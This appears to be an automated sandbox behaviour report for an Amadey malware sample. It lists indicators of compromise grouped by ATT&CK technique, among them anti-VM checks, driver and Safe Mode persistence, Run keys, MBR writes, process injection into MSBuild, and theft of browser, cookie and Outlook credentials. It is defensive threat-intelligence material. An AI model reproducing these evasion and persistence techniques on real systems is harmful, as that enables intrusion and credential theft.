amadey | 2455cf14f9efe4b234215f89b672996d04d219d87a1d73aa1eb4fd497510f3e5

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b18d882399.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8371767ff6.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
24	5048	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5048	powershell.exe
6108	powershell.exe

Downloads MZ/PE file 12 IoCs

flow	pid	Process
80	4356	MSBuild.exe
253	4356	MSBuild.exe
314	4356	MSBuild.exe
328	4356	MSBuild.exe
369	4356	MSBuild.exe
33	3548	rapes.exe
33	3548	rapes.exe
242	2076	svchost.exe
24	5048	powershell.exe
158	4356	MSBuild.exe
238	4356	MSBuild.exe
377	4356	MSBuild.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\367f83e6.sys	eb758663.exe
File created	C:\Windows\System32\Drivers\klupd_367f83e6a_arkmon.sys	eb758663.exe
File created	C:\Windows\System32\Drivers\klupd_367f83e6a_klbg.sys	eb758663.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

credential_access stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_367f83e6a_arkmon.sys"	eb758663.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\I7ts9448_5972\ImagePath = "\\??\\C:\\Windows\\Temp\\y1gZL_5972.sys"	tzutil.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\367f83e6\ImagePath = "System32\\Drivers\\367f83e6.sys"	eb758663.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_arkmon\ImagePath = "System32\\Drivers\\klupd_367f83e6a_arkmon.sys"	eb758663.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_klbg\ImagePath = "System32\\Drivers\\klupd_367f83e6a_klbg.sys"	eb758663.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_klark\ImagePath = "System32\\Drivers\\klupd_367f83e6a_klark.sys"	eb758663.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_mark\ImagePath = "System32\\Drivers\\klupd_367f83e6a_mark.sys"	eb758663.exe

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
3468	chrome.exe
4876	chrome.exe
4288	chrome.exe
2564	chrome.exe
3528	msedge.exe
2084	msedge.exe
4408	msedge.exe
3956	chrome.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8371767ff6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b18d882399.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8371767ff6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b18d882399.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	rapes.exe

Deletes itself 1 IoCs

pid	Process
2044	w32tm.exe

Executes dropped EXE 30 IoCs

pid	Process
5092	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
3548	rapes.exe
1016	AfkeY2q.exe
5088	ibC8xs1.exe
5956	exp.exe
3772	rapes.exe
3184	DgQBvwg.exe
664	exp.exe
5524	steamerrorreporter.exe
4884	steamerrorreporter.exe
5608	Pgpx359.exe
5844	8371767ff6.exe
3724	Pgpx359.exe
676	ibC8xs1.exe
636	exp.exe
5612	DgQBvwg.exe
5652	exp.exe
5384	UZPt0hR.exe
2044	w32tm.exe
5972	tzutil.exe
13836	larBxd7.exe
14328	rapes.exe
6784	b18d882399.exe
7064	9sWdA2p.exe
2104	steamerrorreporter.exe
7792	steamerrorreporter.exe
3712	AfkeY2q.exe
676	259075a7.exe
9164	eb758663.exe
11260	Rm3cVPI.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	b18d882399.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	8371767ff6.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\367f83e6.sys\ = "Driver"	eb758663.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\367f83e6.sys	eb758663.exe

Loads dropped DLL 36 IoCs

pid	Process
5524	steamerrorreporter.exe
5524	steamerrorreporter.exe
4884	steamerrorreporter.exe
4884	steamerrorreporter.exe
5716	remoteBggbv2.exe
2104	steamerrorreporter.exe
2104	steamerrorreporter.exe
7792	steamerrorreporter.exe
7792	steamerrorreporter.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
9164	eb758663.exe
13060	remoteBggbv2.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	MSBuild.exe

Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MSBuild.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	ibC8xs1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	DgQBvwg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	ibC8xs1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	DgQBvwg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\d597609d-7c68-4671-b285-c6d7166535f2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{759d8c2d-fe1d-41be-8619-81267b0d226a}\\d597609d-7c68-4671-b285-c6d7166535f2.cmd\""	eb758663.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	eb758663.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
34	raw.githubusercontent.com
35	raw.githubusercontent.com
347	raw.githubusercontent.com

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	eb758663.exe
File opened for modification	\??\PHYSICALDRIVE0	b18d882399.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
5092	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
3548	rapes.exe
3772	rapes.exe
5844	8371767ff6.exe
14328	rapes.exe
6784	b18d882399.exe

Suspicious use of SetThreadContext 23 IoCs

description	pid	Process	procid_target
PID 5088 set thread context of 4356	5088	ibC8xs1.exe	118
PID 5956 set thread context of 1756	5956	exp.exe	135
PID 4356 set thread context of 3060	4356	MSBuild.exe	138
PID 3184 set thread context of 4480	3184	DgQBvwg.exe	145
PID 4356 set thread context of 5544	4356	MSBuild.exe	159
PID 4356 set thread context of 4028	4356	MSBuild.exe	172
PID 4356 set thread context of 3792	4356	MSBuild.exe	188
PID 4356 set thread context of 2764	4356	MSBuild.exe	191
PID 676 set thread context of 5648	676	ibC8xs1.exe	196
PID 4356 set thread context of 5980	4356	MSBuild.exe	204
PID 636 set thread context of 824	636	exp.exe	208
PID 5612 set thread context of 428	5612	DgQBvwg.exe	213
PID 4884 set thread context of 5388	4884	steamerrorreporter.exe	197
PID 5652 set thread context of 5336	5652	exp.exe	224
PID 4356 set thread context of 2348	4356	MSBuild.exe	234
PID 4356 set thread context of 13712	4356	MSBuild.exe	238
PID 4356 set thread context of 6636	4356	MSBuild.exe	243
PID 4356 set thread context of 7088	4356	MSBuild.exe	246
PID 4356 set thread context of 5296	4356	MSBuild.exe	250
PID 3712 set thread context of 8400	3712	AfkeY2q.exe	253
PID 4356 set thread context of 11932	4356	MSBuild.exe	296
PID 4356 set thread context of 4576	4356	MSBuild.exe	345
PID 4356 set thread context of 11580	4356	MSBuild.exe	403

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	eb758663.exe
File opened (read-only)	\??\VBoxMiniRdrDN	259075a7.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	MSBuild.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI3E3D.tmp	msiexec.exe
File created	C:\Windows\Installer\e583da0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e583da0.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{21A523FF-B931-41F7-BDB8-D9653E221476}	msiexec.exe
File created	C:\Windows\Installer\e583da4.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3204.tmp	msiexec.exe
File created	C:\Windows\Tasks\rapes.job	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	eb758663.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	eb758663.exe

System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pgpx359.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AfkeY2q.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	259075a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pgpx359.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8371767ff6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b18d882399.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AfkeY2q.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eb758663.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
9708	PING.EXE
6248	PING.EXE
10320	PING.EXE
11060	PING.EXE
14096	PING.EXE
14308	PING.EXE
9884	PING.EXE
7880	PING.EXE
10928	PING.EXE
12880	PING.EXE
13368	PING.EXE
7236	PING.EXE
9696	PING.EXE
6412	PING.EXE
6968	PING.EXE
8224	PING.EXE
14296	PING.EXE
14184	PING.EXE
4796	PING.EXE
10280	PING.EXE
11160	PING.EXE
12684	PING.EXE
12564	PING.EXE
10092	PING.EXE
10252	PING.EXE
10728	PING.EXE
11636	PING.EXE
7152	PING.EXE
7496	PING.EXE
13960	PING.EXE
10328	PING.EXE
7728	PING.EXE
8460	PING.EXE
5680	PING.EXE
10420	PING.EXE
13704	PING.EXE
12232	PING.EXE
6288	PING.EXE
7320	PING.EXE
9020	PING.EXE
7552	PING.EXE
12276	PING.EXE
9352	PING.EXE
9684	PING.EXE
13264	PING.EXE
11396	PING.EXE
2316	PING.EXE
14024	PING.EXE
2364	PING.EXE
8092	PING.EXE
8632	PING.EXE
9596	PING.EXE
13156	PING.EXE
5844	PING.EXE
12928	PING.EXE
7860	PING.EXE
11392	PING.EXE
11500	PING.EXE
12512	PING.EXE
10228	PING.EXE
11000	PING.EXE
14248	PING.EXE
7184	PING.EXE
10148	PING.EXE

Checks processor information in registry 2 TTPs 21 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	MSBuild.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rapes.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
7432	PING.EXE
8224	PING.EXE
6412	PING.EXE
7680	PING.EXE
8744	PING.EXE
13368	PING.EXE
8008	PING.EXE
9108	PING.EXE
11824	PING.EXE
12928	PING.EXE
1664	PING.EXE
10376	PING.EXE
13132	PING.EXE
8632	PING.EXE
2316	PING.EXE
7588	PING.EXE
7660	PING.EXE
9600	PING.EXE
9876	PING.EXE
11320	PING.EXE
11488	PING.EXE
4796	PING.EXE
9884	PING.EXE
10076	PING.EXE
12152	PING.EXE
14184	PING.EXE
7928	PING.EXE
8384	PING.EXE
12068	PING.EXE
468	PING.EXE
7728	PING.EXE
8692	PING.EXE
4084	PING.EXE
9904	PING.EXE
7496	PING.EXE
7364	PING.EXE
12376	PING.EXE
4756	PING.EXE
14036	PING.EXE
10928	PING.EXE
13316	PING.EXE
6600	PING.EXE
2364	PING.EXE
10304	PING.EXE
2320	PING.EXE
7184	PING.EXE
9104	PING.EXE
10036	PING.EXE
11712	PING.EXE
13960	PING.EXE
2056	PING.EXE
8880	PING.EXE
